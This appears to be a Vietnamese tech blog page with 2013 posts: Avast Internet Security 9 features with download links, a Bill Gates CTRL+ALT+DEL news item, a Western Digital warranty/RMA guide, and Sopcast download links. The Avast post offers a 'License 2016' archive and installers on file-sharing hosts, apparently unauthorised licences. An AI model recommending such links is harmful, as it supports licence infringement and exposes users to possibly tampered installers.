Tài khoản avast! là một thư mục cá nhân dành cho avast! liên quan đến tất cả dữ liệu của máy tính để bàn và thiết bị di động.

Những tính năng mới của avast! Internet Security:
Tính năng bảo vệ:
+ Silent Firewall: cải thiện bản ghi để biết thêm thông tin chi tiết/số liệu thống kê và hỗ trợ cả IPV4 và IPV6 mới.
+ Anti-spam: chức năng báo cáo đã được cải thiện.
+ Avast! Sandbox: cung cấp thêm lớp bảo mật để chạy ứng dụng của bạn trong một môi trường ảo.
+ Browser Cleanup: loại bỏ những thanh công cụ không mong muốn và plug-in gây phiền toái (Mới).
+ Software Updater: hiển thị tổng quan tất cả các phần mềm và ứng dụng đã lỗi thời của bạn (Mới).
+ Behavior Shield: nâng cao độ chính xác (Cải thiện).

Tính năng nâng cao
+ Giao diện người dùng: dễ sử dụng với các tính năng tùy chỉnh được (Mới).
+ Tối ưu hóa màn hình cảm ứng: đơn giản hóa Avast cho những người sử dụng thiết bị cảm ứng dựa trên Windows 8 (Mới).

Yêu cầu hệ thống:
Hệ điều hành được hỗ trợ:
+ Windows 8 (bất kỳ Edition, 32-bit hoặc 64-bit, excl. RT Edition).
+ Windows 7 (bất kỳ Edition, 32-bit hoặc 64-bit).
+ Windows Vista (bất kỳ Edition excl. Starter Edition, 32-bit hoặc 64-bit).
+ Windows XP Service Pack 2 hoặc cao hơn (bất kỳ Edition, 32-bit hoặc 64-bit)).

Yêu cầu phần cứng tối thiểu:
+ Bộ xử lý: Pentium 3.
+ RAM: 128 MB.
+ Ổ cứng trống: 600 MB.

Để có kết quả tốt nhất bạn nền gỡ bỏ bất kỳ phần mềm chống virus khác trên máy tính trước khi cài đặt avast !

Download Avast Internet Security 9
+ 4share : Avast_Internet_Security_9.zip
+ Fshare : Avast_Internet_Security_9.zip
+ Dropbox : Avast_Internet_Security_9.zip
+ Copy : Avast_Internet_Security_9.zip

License Avast Internet Security 9 2016
+ 4share : License_Avast_Internet_Security_2016.zip
+ Fshare : License_Avast_Internet_Security_2016.zip
+ Dropbox : License_Avast_Internet_Security_2016.zip
Xem tiếp...

Thứ Bảy, 28 tháng 9, 2013

Bill Gates: CTRL+ALT+DEL là một sai lầm


Bill Gates: CTRL+ALT+DEL là một sai lầm
Bill Gates: CTRL+ALT+DEL là một sai lầm

Bill Gates: CTRL+ALT+DEL là một sai lầm


Trong một cuộc phỏng vấn tại Đại học Harvard - Mỹ vào tuần trước, Chủ tịch Microsoft, Bill Gates thừa nhận cách đăng nhập vào Windows bằng tổ hợp phím CTRL + ALT + DEL là một sai lầm.
MỜI CÁC BẠN ĐÓN ĐỌC NHỮNG BÀI VIẾT CHỌN LỌC VỀVI TÍNH VÀ INTERNET, THỦ THUẬT VÀO LÚC 7H30, 13H, VÀ 16H CÁC NGÀY TRONG TUẦN, TẠI 24H.COM.VN

Bill Gates hối tiếc cho biết, người dùng Windows thường ghét nó, và nó trở thành phím tắt máy tính tồi nhất mà ông từng đưa vào. Ông cũng cho rằng tổ hợp phím này cũng đã bị nhiều Giám đốc điều hành Microsoft chỉ trích, và ông đổ lỗi cho IBM không thay thế nó bằng một nút phần cứng duy nhất.
Bill Gates: CTRL+ALT+DEL là một sai lầm - 1
Bill Gates cho rằng sự kết hợp của tổ hợp phím này là một sai lầm
Đối với người dùng doanh nghiệp, tổ hợp phím CTRL + ALT + DEL được phát triển như là một tính năng bảo mật. Microsoft đã lo ngại rằng phần mềm độc hại có thể đánh chặn tên người dùng và mật khẩu bằng cách đặt một hộp đăng nhập giả mạo, chính vì vậy việc kết hợp giữa các nút bấm sẽ tạo ra sự an toàn, giúp Windows bỏ qua bất kỳ phần mềm độc hại nào.
Theo Gates, sở thích ban đầu của ông là tạo ra một nút duy nhất trên bàn phím có thể làm điều tương tự. Tuy nhiên, máy tính IBM được thiết kế bởi David Bradley đã từ chối điều này, thay vào đó sản phẩm đã lựa chọn việc kết hợp giữa các phím nói trên.
Tuy nhiên, việc kết hợp giữa các tổ hợp phím này lại là điều khó khăn cho báo chí. Mục tiêu ban đầu của Bradley là cung cấp một các dễ dàng cho các nhà phát triển khởi động lại hệ thống trong quá trình xử lý sự cố, và thực tế ban đầu ông có ý định sử dụng tổ hợp phím CTRL + ALT + ESC, tuy nhiên theo ông việc kết hợp này được thực hiện quá dễ dàng để kích hoạt, chính vì vậy chia lệnh trên bàn phím là điều mà ông suy nghĩ đến.
Bill Gates: CTRL+ALT+DEL là một sai lầm - 2
Microsoft sau đó cũng đã đồng chung ý định của Bradley khi chấp nhận tổ hợp phím CTRL + ALT + DEL trong Windows 3.1 trở đi được dùng để mở hộp thoại quản lý công việc, và điều phiền toái đã được bắt đầu. Tất nhiên tổ hợp 3 phím vẫn là một phần của Windows, và Windows 8 mới nhất vẫn sử dụng chìa khóa này để mở màn hình đăng nhập, đặc biệt khi nó đã quá quen thuộc.
Ngoài ra, trong cuộc phỏng vấn kéo dài 1 tiếng đồng hồ này, Gates nói rằng ông không hối hận khi bỏ học tại Harvard để hình thành lên Microsoft bởi phát triển phần mềm thời điểm đó là điều cần thiết. Có điều, ông vẫn không thừa nhận "kẹp giấy" Clippy, một nhân vật xuất hiện trong ứng dụng Office của Microsoft trong một thời gian dài nhưng đã bị người dùng thờ ơ, buộc hãng phải xóa bỏ nó kể từ Office 2007, như là một sai lầm.
Theo Thu Phương (nguoilaodong)
Xem tiếp...

Thứ Năm, 26 tháng 9, 2013

Hướng dẫn KIỂM TRA BẢO HÀNH ổ cứng western

Western.com.vn sẽ hướng dẫn khách hàng kiểm tra ổ cứng khi mua hàng có phải là hàng chính hãng không theo số serial ổ cứng và thời hạn bảo hành đến khi nào? Việc đăng ký bảo hành tại WD có thay đổi (Đăng ký tài khoản và tạo RMA) nhằm đảm bảo quyền lợi cho bạn khi sử dụng sản phẩm chính hãng. Trước khi mang ổ cứng đến trung tâm bảo hành của hãng thì bạn phải đăng ký, tạo RMA theo hướng dẫn dưới đây:

Bước 1: Truy cập http://support.wdc.com/warranty/
Chọn "End User Customers"

hướng dẫn bảo hành ổ cứng Western

Tiếp tục bạn chọn "Product Replacement (RMA)"

hướng dẫn bảo hành ổ cứng Western


Chọn tiếp "Continue to WD Support Portal"

hướng dẫn bảo hành ổ cứng Western

Bước 2: Đăng ký tài khoản
- Nếu bạn đã có tài khoản thì nhập Email, password và click "Continue" để tiếp tục
- Nếu bạn chưa đăng ký tài khoản thì bạn bấm vào "click here" sẽ dẫn bạn đến trang đăng ký thông tin cá nhân

hướng dẫn bảo hành ổ cứng Western

Điền thông tin bắt buộc (có dấu gạch đỏ)

hướng dẫn bảo hành ổ cứng Western


hướng dẫn bảo hành ổ cứng Western

Bước 3: Bạn sẽ thấy hộp thông tin như hình dưới

đăng ký bảo hành western

Các tùy chọn:
- "Warranty Check": kiểm tra thời hạn bảo hành của ổ cứng : khi mua sản phẩm tại công ty, cửa hàng bạn nên yêu cầu check thời hạn bảo hành của ổ cứng luôn.
- "Product Registration": đăng ký sản phẩm: đăng ký trước khi tạo RMA
- "Product Replacement" : tạo RMA

Để đăng ký bảo hành bạn chọn “ Product Registration ”, Click "Register New Products"

hướng dẫn kiểm tra bảo hành western

Tiếp theo bạn nhập số Serial sản phẩm

kiểm tra bảo hành Western

Hộp thông tin đăng ký hiện ra, bạn sẽ thấy được thời hạn bảo hành sản phẩm, bạn chọn nơi mua và thời gian mua sau đó Click " Register Product "

đăng ký sản phẩm bảo hành western

Bước 4: Bạn đã đăng ký xong sản phẩm bảo hành, ổ cứng của bạn sẽ xuất hiện trong danh sách các sản phẩm đã đăng ký. Tiếp tục tạo RMA:  Click tab " RMA " phía trên


tạo RMA đăng ký bảo hành Western


hướng dẫn bảo hành ổ cứng Western

Bước 5: Nhập số Serial của ổ cứng vào "Serial Numbers", cho phép bạn nhập tối đa 20 số serial

hướng dẫn bảo hành ổ cứng Western

Click "Continue"
 
Bước 6
: Thông tin về ổ cứng của bạn, thời hạn bảo hành, lưu ý bạn nhớ chọn lý do bảo hành tại “Return Reason

hướng dẫn bảo hành ổ cứng Western

Bước 7: Chọn địa chỉ của bạn (Existing Address: địa chỉ đã đăng ký trước đó)
Chọn “Create RMA

hướng dẫn bảo hành ổ cứng Western

Nếu muốn thay đổi địa chỉ bạn chọn "New Address" --> gõ địa chỉ và Submit

Hướng dẫn bảo hành WD

Hệ thống sẽ cấp số RMA. Kết thúc việc tạo RMA bảo hành ổ cứng. Hệ thống sẽ gửi email thông báo về địa chỉ email của bạn. In nội dung email  và mang ổ cứng đến Trung tâm bảo hành

hướng dẫn kiểm tra bảo hành ổ cứng WD

Trung tâm bảo hành WD tại Việt Nam

- Hà Nội: 950 Đường Láng - Hà Nội (Điện thoại: (84-4) 32 595 311)
- Thành phố Hồ Chí Minh: số 9  Đặng Thị Nhu, Q1, Tp.HCM (Điện thoại: 08 39 183 362)

Xem tiếp...

Thứ Bảy, 21 tháng 9, 2013

Download Sopcast 3.8.2 full mới nhất - Xem Tivi, đá bóng miễn phí

tải sopcast xem bóng đá, sopcast 3.8.3, sopcast phiên bản mới nhất, sopcast k+, sopcast việt nam, xem bóng đá, sopcast webplayer, sopcast channels, sopcast channel list, sopcast
Hiện nay, Sopcast đã trở nên phổ biến trên Internet với hàng triệu lượt tải mỗi tháng. Ưu điểm nổi bật của nó là giúp chúng ta có thể xem bóng đá trực tuyến với chất lượng cao mà không bị giật.


Download Sopcast 3.8.3 mới nhất

Nó cũng cho phép xem rất nhiều kênh truyền hình trên thế giới, trực tiếp hầu hết các giải bóng đá với nhiều ngôn ngữ khác nhau.

Các giải đấu bóng đá hàng đầu thế giới như Ngoại hạng Anh, La Liga, Serie A, Bundesliga, Cúp C1 Châu Âu, Europa League, Worldcup, Euro đều có thế xem trực tiếp một cách dễ dàng với Sopcast.

Link sopcast xem các trận đấu được cung cấp ở đây => http://sinhvienit.net/forum/link-sof...at.274266.html

Download Sopcast 3.8.3 full mới nhất

Các bạn có thể dùng 1 trong các link sau:


Link File.SvIT: http://file.sinhvienit.net/3aaa0b86
Link upfile.vn: http://upfile.vn/qloP
Link fshare.vn: http://www.fshare.vn/file/TQQSBP0DQT
Link 4share.vn: http://up.4share.vn/f/3f0c0f0d0c0b0f0d/

Change log:
* Improved the data transfer performance.
* Fixed a bug in crash report module.
* Fixed a bug in install.bat file.
Phiên bản sopcast cũ hơn:
Sopcast 3.8.2
Xem tiếp...